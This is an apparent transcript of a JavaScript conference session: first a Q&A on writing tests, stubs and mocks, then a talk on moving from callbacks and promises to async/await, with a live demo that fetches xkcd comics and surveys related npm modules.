And what does all of this give you? You've followed all of these twelve points, you've mastered the art of writing mature tests; what does that get you? Well, onboarding new people isn't a nightmare. Consider a scenario: you have a huge project, and I decide to join tomorrow. I see this massive code base, I come to your desk, and I'm like, please explain to me what all of these files do. You don't have the time or the patience to do that. But if you have good test suites with proper naming conventions, where the describe and it blocks make proper sense, you can just redirect me to them.

In my experience, you don't really need mocks at all in the majority of cases; this is just my personal experience. What I've seen is that a stub with pre-programmed behaviour suffices in most cases. You use mocks only when you actually want to assert on the response something gives. For example, if you're making a third-party call to get some data and you need that to backfill your test, a mock makes sense, because you're saying that rather than actually making that third-party call, this is what the call would end up returning. But if you're calling something internal, like in the examples I showed, a getUser on a DB service, or an internal method that does some computation, stubs make a lot more sense, because you can simply specify the function that should override that implementation. And since I'm talking mostly about unit tests, which ideally should not include third-party calls at all, mocks don't make sense in those scenarios. That's the main distinction I draw: for anything internal that you're calling, stubs suffice; for third-party calls, go with a mock.

In your eleventh point, where you explained why the test that just asserted one-equals-two was not a proper one, the solution was to write a comment over it so the reader can understand. Should that be there? If I have to rely on a comment, I could write the same comment in the code itself instead of on the test block, and the describe and it would be self-explanatory.

That's a great question, actually. My counter-argument whenever someone asks that is: I use tests to onboard people. Like I mentioned, onboarding isn't a nightmare if you have good test specs, and if I'm redirecting someone to the tests, I want them to have to look at the actual code as little as possible. I ideally tell them: collapse all the describe and it blocks and just read the sentences they make. Say, oh, dispatching the active bucket should do this, should do this in this scenario, should do that in that scenario, and so on. Ideally they never open the it blocks at all; in the worst case, if they'd like to see what's happening, they expand the it block, and if they find a comment like this there, they don't have to go into the code. If that person goes into the code file to read the comment, isn't he now in a new rabbit hole? He starts trying to decipher what that code is doing, how things work, how things integrate together, and actually gets a little confused. So in my experience, specifying these things at the test level makes more sense in these cases.

Hey, I'm here at the back; can you hear me? Yeah, I can. Okay. Great talk; I liked the idea of designing test cases before actually writing them. Thank you. I have a question on documentation. Let's say I have written test cases for five to ten files, and somebody is joining my team. I would want that team member to go through documentation first, rather than going into the test cases and looking at the assertions. Comparing to code: if you add... JSDoc, I think, I forgot the name... JSDoc, yeah... comment blocks on top of your methods, you can use any npm package to generate documentation easily. Is there anything like that for test cases as well?

So JSDoc actually makes a lot of sense, and we do use it heavily for some things. But what I've seen is that when you are working in a fast-paced environment, on a module that might not even exist tomorrow, because expectations change in startups, you don't really have the time and patience to write those beautiful JSDoc comments. Something as simple as a normal comment specifying what I'm trying to do here, or describe and it blocks that make proper sentences, suffices there. If I'm writing a module that is being open-sourced, or that is going to be well maintained over time, I would definitely recommend going with JSDoc, because you can have a simple npm command regenerate the documentation whenever you make changes; that can be part of your publishing pipeline, so that whenever you publish, the documentation is updated from the latest comments. That makes a lot more sense for modules you know are going to stick around. But when you're just hacking something together quickly, for something that is rapidly iterating, the simpler things make more sense.
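For a module that will stick around, the JSDoc route described here looks roughly like this (deleteTeam is a hypothetical function); a tool such as the jsdoc npm package can then generate HTML documentation from these blocks:

```js
/**
 * Deletes a team on behalf of a user. (Hypothetical example function.)
 * @param {number} userId - ID of the acting user.
 * @param {string} teamId - ID of the team to delete.
 * @returns {Promise<void>} Resolves once the team is removed.
 */
async function deleteTeam(userId, teamId) {
  // ...
}
```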
Okay, so my question was whether we have any tool to generate documentation from test cases, similar to JSDoc. Probably; I haven't come across one. If you do, please tweet about it; I'd be happy to look at it. Thank you. Okay, thank you.

Deepak Pathan here. That guy had a question; did we answer it? We'll cover it. Okay, cool, thank you. So I think I'll force my backend developers to write tests when I go to the office one day; I don't know about you guys.

Our next speaker is Hemanth. He's an ambidextrous guy, and he also has a Guinness record. He says he had a virus in his brain and he's been acting weird since then; I don't know why he's acting weird, you need to find out. He's also a polyglot and a Google Developer Expert, and he spends most of his time in the free and open-source software movement, helping DuckDuckGo and other open-source projects. Let's welcome Hemanth.

Can you hear me, guys? Namaskara, JSFoo! Thank you for being here for such a long time. I'm going to end the day with a story: the story of Ved, my son, who wanted to learn some serious JavaScript. I suggested that he not read the lite versions of JavaScript but something serious: JavaScript for Babies. He did read it, and his first assignment was to read a file. As simple as that. He said, well, that's easy: I'll just do a readFileSync, give me the file name, and I'll read it. Okay, but it blocks. So he learned some more and came to the callback version: instead of readFileSync he started using readFile, passing the file name and a callback. After the file is read, the callback fires; if there's an error, you call back with the error, otherwise with the result. This is the normal drama all of us have been through so far.

Okay, that's not bad. Now you want to process the same file you have read. How do you do it? He said, that's easy again: he started with a simple function call, process, to which the data and a callback are passed, and the same pattern continued: reading the file, checking for and handling errors in callbacks, returning through callbacks, with another callback inside the processing step. Yo dawg, I heard you like callbacks, so we put callbacks in your callbacks so we can call you back when your callbacks are done. This is the common slide most of us use, from Mozilla, explaining the pyramid of doom: an example where you want to cook some rice, you pour some water, bring it to boiling temperature, lower the heat, add the rice, set a timeout... and count how many callbacks we already have just to eat our rice.

Promises. When you know, then you know, right? A promise is an object that resolves to some result; it's kind of promising you: I'll give you some result at some point in time. It can go through different states: it can be fulfilled or rejected. If it's fulfilled, you chain it with then; if it's rejected, it goes to the catch. The fun part is that with then you can also handle both fulfillment and rejection; and finally the promise is settled. The idea is that you return a promise and then chain it: you chain your promises with thens and catches, and after a catch you can chain another then. A simple example: you create a new Promise and pass it a function with resolve and reject. If everything goes well, you resolve it; if there's a problem, you reject it with what the problem was. Then you can call promise.then, and the first callback you pass runs on fulfillment, while rejection goes to the second callback or the catch.

Here's a simple node module I've written called lie-fs, but today, if you're on recent versions of Node, you can use the promisified version of fs, fs/promises, which ships with Node itself. What lie-fs basically does is promisify all your fs methods. So in this example, if you want the stats of your tmp directory, you just call the stat method on /tmp and you get back a promise; you can log the result, or log the error if there is one.
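A minimal sketch of that journey, with processData standing in as a hypothetical next step:

```js
const fs = require('fs');

// Hypothetical next processing step from the talk's example.
const processData = (data, cb) => cb(null, data.toUpperCase());

// 1. Synchronous: the simplest version, but it blocks the event loop.
const text = fs.readFileSync('notes.txt', 'utf8');
console.log(text);

// 2. Callback style: non-blocking, but the nesting grows with every step.
fs.readFile('notes.txt', 'utf8', (err, data) => {
  if (err) return console.error(err);
  processData(data, (err2, result) => {
    if (err2) return console.error(err2);
    console.log(result);
  });
});

// 3. Promisified fs: built into modern Node as fs.promises (or fs/promises);
//    wrappers like lie-fs did the same for older versions.
fs.promises.stat('/tmp')
  .then((stats) => console.log(stats))
  .catch((err) => console.error(err));
```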
But there's a problem again with promises: if you're not careful, you end up with something like this. There are mitigations, similar to how you escape callback hell: name your functions, keep your promises separate, all those things. But it's not guaranteed that everyone will practice them, and you will have seen many code bases with this kind of thing. Here's one more real-world example, where you connect to the database, get the user information, get the user settings, and finally enable access. It almost looks like callback hell, just with more chaining of thens.

How many of you know this guy? Awesome. That's TJ. TJ wrote a blog post a few years back: streams are broken, callbacks are not great to work with, errors are vague, the tooling is not so great, and community conventions are sort of all over the place. For a very long time I thought TJ was a company, given the amount of code he was churning out, but then I happened to maintain one of his repos, git-extras, and only then did I believe that TJ exists as a person. Even though he quit Node, he was pretty active on this project called Koa, which I'll be talking about; I think he saw the future.

Welcome to Jurassic Park: async/await. async is a keyword which, used next to a function, indicates that whatever you return from that function will be wrapped in a promise. It could be as simple as return 1: if you have an async function and you return 1, it returns a promise that resolves to 1. And async functions are the only functions in which you can use the await operator. What is the await operator? await is an operator that suspends execution in its scope. What I mean by that is: suppose you have an async function and you are waiting for a promise to resolve; await suspends the order of execution, like pausing the flow, but only within that async block, and waits until the promise is either resolved or rejected. If the promise is rejected, it throws.

In 2016 I said that in ES2017 the code we write would look sync but run async. And in 2015, at 3 in the morning, I said that async/await is no fun till it gets an easier way to capture rejected promises. Back in 2014 I gave a talk on async/await when it was in the proposal state, and people said, dude, it doesn't make sense.

But today, this is how we can define an async function. The emoji is just for the fun of it: if you want to define that kind of function, you have a plain object and you put the emoji in a string as the property name, and you can still define it. You can see it's an async function and it can await; otherwise it's like a normal function. You can also use an arrow function, or a generator. Here's an example; this one is from the spec. What it does is take an element and a set of animations, apply each animation to that element, and finally return the last value after applying the animations. On the left is the promise way of doing it: you start with Promise.resolve() as your initial promise (you could also rewrite this with reduce), and for each of the animations you chain a then, apply the animation, save the result, and finally return it; if there is an error, you catch it, of course. If you rewrite the same thing with async/await, it looks like this: an async function with a try/catch block, and for each of the animations you just await the animation and keep the return value. It's so intuitive: read what's happening on the left and what's happening on the right (or, from where you're sitting, your left and your right), and the await version reads as if it were synchronous code, yet it runs asynchronously.
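The slides aren't reproduced in the transcript; the pair below is adapted from the async/await proposal's well-known chained-animations example, so treat the details as approximate:

```js
// Promise chaining: thread the result through manually.
function chainAnimationsPromise(elem, animations) {
  let ret = null;
  let p = Promise.resolve();
  for (const anim of animations) {
    p = p.then(() => anim(elem)).then((val) => { ret = val; });
  }
  return p
    .catch(() => { /* ignore a failed animation and keep going */ })
    .then(() => ret);
}

// async/await: the same logic, reading top to bottom.
async function chainAnimationsAsync(elem, animations) {
  let ret = null;
  try {
    for (const anim of animations) {
      ret = await anim(elem);
    }
  } catch (e) { /* ignore a failed animation and keep going */ }
  return ret;
}
```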
All right, demo time. I had written this xkcd comic fetcher. How many of you follow xkcd? Okay, awesome. What it does is basically fetch me a random xkcd cartoon. You're not able to see that? All right, this screen is not coming up there, probably because I'm on fullscreen, and it's tough to watch the big screen and type. Let me enable mirroring... this is not working... one second, sorry for that. All right. So basically this endpoint gives me a random xkcd cartoon: it gives me the URL and the title. Now let us go on a journey of fetching this URL from the console and see how it goes.

We start with XHR. It's big. We do a new XMLHttpRequest. The name is XMLHttpRequest, but no more are we doing XML calls, and it's not just HTTP either; it's more like a Gulab Jamun, neither Gulab nor Jamun. But we owe our lives as JS developers to it; it's the gift from Microsoft, the people who enabled XMLHttpRequest. We do xhr.open, which takes a method, in this case GET... and that's not the URL; this is the URL we are talking to. And I'm not sure how many of you are aware of, or have used, the last parameter: passing false there makes this a synchronous network call. That's where Chrome spits directly in your face, saying: hey, don't do this. And if you try to set the responseType on it, you can't, because it is synchronous. Now we say on loadend we will console-log the image: xhr.response.data dot... what is the thing we were getting? response.url, right. And then we send. We got the response; it has title and url; we log the image, and what we got was this. Yeah, this is how it should have rendered. It's coming straight from the server; nothing is mocked; it's not my fault.

We do a new XMLHttpRequest again, and this time let's quickly make it asynchronous: we open with GET again, but we do not pass that false. Then, on loadend, let's quickly log what we get as the response: response.data.url, and we send. So it's not data.url, for sure. We open again... all right, that's the good way to do it... we've done an open, we'll do a send... it should just have been xhr.response.url, right? It's a string. Okay, very attentive audience at 5 p.m. All right, we open again and we send. That was perfect. We got the point, so let's move on to the next one.
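A cleaned-up sketch of the two XHR variants from the demo; the random-comic endpoint isn't named in the talk, so RANDOM_XKCD_API is a hypothetical placeholder returning { title, url }:

```js
const RANDOM_XKCD_API = 'https://example.com/random-xkcd'; // hypothetical endpoint

// Synchronous XHR: the third argument `false` blocks the main thread,
// browsers warn loudly, and responseType cannot be set on a sync request.
const xhr = new XMLHttpRequest();
xhr.open('GET', RANDOM_XKCD_API, false);
xhr.send();
console.log(JSON.parse(xhr.responseText).url);

// Asynchronous XHR: the default; handle the result in a loadend callback.
const xhr2 = new XMLHttpRequest();
xhr2.open('GET', RANDOM_XKCD_API);
xhr2.responseType = 'json';
xhr2.onloadend = () => console.log(xhr2.response.url);
xhr2.send();
```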
So we started with XHR: we did a synchronous call, then an asynchronous call, and we saw the network request happening. Now it's time for jQuery. With jQuery, what do we do? We do a getJSON. And I'd better define this URL as an API somewhere... I'll call it API and pass it here. So we do $.getJSON, pass the API, and we get the callback, which receives the data. In this case, will the data be passed or not? It is. We render the image from data.url, and okay, we have the image in the console.

So that was jQuery: we've done synchronous, asynchronous, and jQuery. What's next? Yes, the fetch API, and it returns a promise. So we do a then and say we have a d; calling d.json() gives us the JSON. Then we do a then again with the response, and log the image from response dot... what would it be here? url, right. And then we'd probably want a catch, in case there is an error. Let's see. Okay, there we go; that's neat.

So how do we take this further? Now let's try a bit of await. We remove this and say await fetch. One gotcha here: you can't really use await at the top level; there is a proposal for top-level await. What do I mean by top level? Basically, you need to wrap this line in an async function, as mentioned earlier. In the dev console, though, a top-level await gets wrapped in an async function for you, so you can await in the dev console without wrapping it yourself. So we do an await and we get a response. This would have a json() on it, wouldn't it? We await that, we get the data, and we log the image from data.url... making the request... so we wrap this entire thing... this is fine, right? Yeah, that's where the url is coming from. We wrap the entire thing, and there we go. It's a really bad way to do it, as we noticed, having await await await on one line; that's just for demo purposes, to show what we are awaiting for. And thanks for being an enthusiastic audience and highlighting all the scripted mistakes. Awesome. So we saw the journey: from synchronous, to asynchronous, to the jQuery kind of thing, to await today. Kind of clear? Okay.

So here's a quick quiz: what would the left snippet log, and what would the right one log? By intuition, the left looks like it would log a, b, c. Right? Yes? Yes, but no: it will not; it will end up logging c, b, a. But why? What's the difference between the two? The key difference is the await: in one of them there's a return await, and that one prints a, b, c. It's a contrived example, just to show how await makes a difference, but it's a key point to remember: whenever you're returning something out of a try block that holds a promise, make sure you're awaiting it; that's when the function actually waits for the promise to get resolved. In the other case it doesn't. That's where you can see how the pausing mechanism of await really works.
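Since the quiz slides aren't in the transcript, here is a minimal reconstruction of the same class of ordering gotcha, pasteable into a console (the exact slide code may differ):

```js
const log = (msg) => Promise.resolve().then(() => console.log(msg));

async function withoutAwait() {
  log('a');          // scheduled as a microtask, not awaited
  log('b');
  console.log('c');  // runs first, so this version logs: c, a, b
}

async function withAwait() {
  await log('a');    // execution pauses inside this async function
  await log('b');
  console.log('c');  // this version logs: a, b, c
}

// The same mistake bites inside try/catch: `return promise` leaves the
// try block before the promise settles, so the catch can never fire.
async function noCatch() {
  try {
    return Promise.reject(new Error('boom'));
  } catch (e) {
    console.log('never reached');
  }
}

async function withCatch() {
  try {
    return await Promise.reject(new Error('boom'));
  } catch (e) {
    console.log('caught:', e.message); // fires, because we awaited
  }
}

withCatch();                // logs "caught: boom"
noCatch().catch(() => {});  // the rejection surfaces to the caller instead
```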
And suppose you have two async functions. Rather than awaiting each one in turn, you could use Promise.all: await Promise.all of your two async functions, and whatever their responses are come back as r1 and r2. There was also a proposal for await.all, which got rejected; and at the very beginning there was a proposal called await* that did exactly this, but even that's gone.

In the previous talk we also saw async.waterfall being used a lot. If you were to rewrite async.waterfall and async.series with async/await, how would you do that? On the left you have waterfall: you await async function one, its result is r1; then you await async function two, passing r1 to it, and you get r2. So it behaves like a waterfall. On the right you have series, which is pretty simple: you can just return an array of awaits.

And if you have an async iterator, you can iterate it with await. This is because you can't await inside forEach: it isn't async-aware, so you can't wait in it for things to get resolved, or for whatever processing you are doing. That's where the for await...of loop comes in. If you have an iterable, in this example a simple iterator whose results are promises, you can await each of them and log it out. Another example: instead of writing Promise.all everywhere, you can have an all higher-order function where you pass in the parameters and do the Promise.all inside; you can pass individual promises like p1 and p2, or spread an array out, send all the requests, and get the results back as an array.

You can also use await on any thenable. In this example it's just an object which has a then whose parameters are resolve and reject; you can await on it and it console-logs 42. So it need not be a promise; it can be any thenable. And if you have a class that is thenable, you can easily await it inside an async function.

If you are using Express and you want a middleware with async/await in it, you have to do a bit of a circus: you have to wrap your middlewares in a promise that resolves that function; basically you pass your middleware to a helper that wraps it in a promise and passes it on. Instead, there is the project I mentioned that TJ was interested in, Koa.js, which started with generators and now supports async/await. As you can see, the pointer moves every time there is an await next(): it goes to the next chained middleware automatically. So you don't need to wrap your middlewares; just use await. It's a very lightweight module; you could try using it.

And the painful part, if you have observed, is that you have to wrap every await that might throw in a try/catch; or you could chain a .catch onto the promise. But isn't it painful to have a try/catch block everywhere an await might throw? So here is a wonderful module called await-to-js: you require it as to, and say await to(promise), and it gives you the error and the result as an array. It's pretty straightforward: you can do as many awaits as you want without putting them in try/catch blocks.
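A compact sketch of those patterns; stepOne and stepTwo are hypothetical async steps, while await-to-js is the real module named in the talk (npm i await-to-js):

```js
const to = require('await-to-js').default; // npm i await-to-js

// Hypothetical async steps.
const stepOne = async () => 1;
const stepTwo = async (n) => n + 1;

async function demo() {
  // async.waterfall, rewritten: each step feeds the next.
  const r1 = await stepOne();
  const r2 = await stepTwo(r1);

  // async.series, rewritten: sequential, results collected into an array.
  const series = [await stepOne(), await stepTwo(r2)];

  // Independent work can run in parallel with Promise.all instead.
  const [a, b] = await Promise.all([stepOne(), stepTwo(r2)]);

  // await works on any thenable, not just real promises.
  const answer = await { then: (resolve) => resolve(42) };

  // await-to-js: [err, result] instead of try/catch around every await.
  const [err, result] = await to(stepOne());
  if (err) console.error(err);

  return { r2, series, a, b, answer, result };
}

demo().then(console.log);
```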
And there is another fantastic module called proxymise. Instead of writing foo.then().then().then(), chaining all the thens, or having await after await, you can proxymise your foo and then just say foo.bar.baz.qux and get the value directly. It's simple chaining; it's almost like accessing object properties. Proxymise is one such wonderful tool, and if you want to know about more modules like these, you can subscribe to my node-module-of-the-week list.

Now, a final couple of minutes of gotchas. You might be wondering: if I want to use async/await today, most of you would probably run it through Babel or something, right? So what happens when it transpiles? You have a while (1). It uses regenerator, and there's a while (1) loop running, because the browser has not implemented the feature and Babel has no other option but to implement a state machine itself, with that loop driving it. To mitigate this there is a wonderful plugin; it's experimental, and I think the PR is approved but not yet merged, but you can still use it: babel-plugin-async-to-promises. If you look here, on the left you have your async function, and on the right is the transpiled output. It looks as good as hand-written promises, unlike the previous output with its while (1) and regenerator machinery.

The other thing the V8 team has been working on is errors: as of today, on Node, it's much better at telling you where exactly the error happened. Previously, if an error was thrown, it would just say something like d8 1:44 and you had to figure out where it was thrown; now it's improved, and it says async Promise.all and exactly where the error got thrown. And Benedikt posted this last night: benchmarks for async/await and parallel promises, so you can see for yourself, on version 8.7, how fast it is. Unless you are into real micro-level optimization, this is perfectly good to use.

And here's the last fun thing you can do. If you are on VS Code, you can enable this for TypeScript and even for JavaScript: converting a block of code that uses promises into async/await. You saw that? Yeah, you just highlight the block, hit refactor, and all your promises become async/await in one shot. You could probably earn bonus points using this and say, hey, I wrote the entire project with async/await, kudos to me.

And support: these are the numbers in browsers. If you're on Node, you're good on 7 and above, really good on 8, and on 12 you're at a hundred percent; all the async/await features are there. That's it. You can tweet me at gnumanth and catch me on h3manth.com. Hope you liked it. Thank you, guys.

We can take some questions; we're out of time, but maybe a couple of them. And sorry, one announcement: tomorrow, make sure you bring your badges, because they're not going to be reprinted. Also, the feedback forms that have been given to you, can you drop them off? There's a box outside. They're laid out in trays near the aisles here and there; please pick one up on your way. We really appreciate your feedback. Let's take the questions.

Hey, hey. Lovely presentation. Thank you. So my question is: you said that Koa started off with generators and then sort of went back, or settled, on async/await.
So in your general day-to-day work, what is your comparison between generators and async/await? For example, Redux-Saga very much uses generators today, right? Do you see generators as the next step, or as too much of a step?

It would be more like a parallel track; it's not a next step, because the two live side by side. It's at your discretion whether you reach for generators: you can do a yield* with a generator, but you can't do an await.all or await*; it doesn't make sense. So if you're using a lot of iterators and you have to make a lot of next() calls, a generator is a good use case. For example, I wrote a blog post where I traverse trees with generators; it's a simple thing, but with generators it looks even more intuitive to traverse a tree. So if your use case involves something where a generator is beneficial, it's better to use one. But I think async/await is the way to go: it went through a lot of churn and it's essentially complete now; there's nothing much left to add to it or remove from it. So I think it is a safe bet.

Thanks. And when you talked about await all, which basically just wraps a Promise.all: what benefit do I get out of that? If I had multiple promises and I passed them to a Promise.all, versus wrapping that same thing in an await all, what do I gain?

Rather than having a Promise.all everywhere, I thought of it as a pattern: you define an all helper once at the beginning, and then you can pass it individual promises or a set of promises and spread them out.

Okay, yeah, that kind of makes sense. Thank you, guys.
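For reference, a minimal sketch of the all helper being discussed, with fetchUser and fetchSettings as hypothetical async calls:

```js
// A thin wrapper so call sites don't repeat Promise.all everywhere.
const all = (...promises) => Promise.all(promises);

// Hypothetical async calls.
const fetchUser = async () => ({ name: 'Ada' });
const fetchSettings = async () => ({ theme: 'dark' });

async function main() {
  // Pass promises individually, or spread an existing array into it.
  const [user, settings] = await all(fetchUser(), fetchSettings());
  console.log(user, settings);
}

main();
```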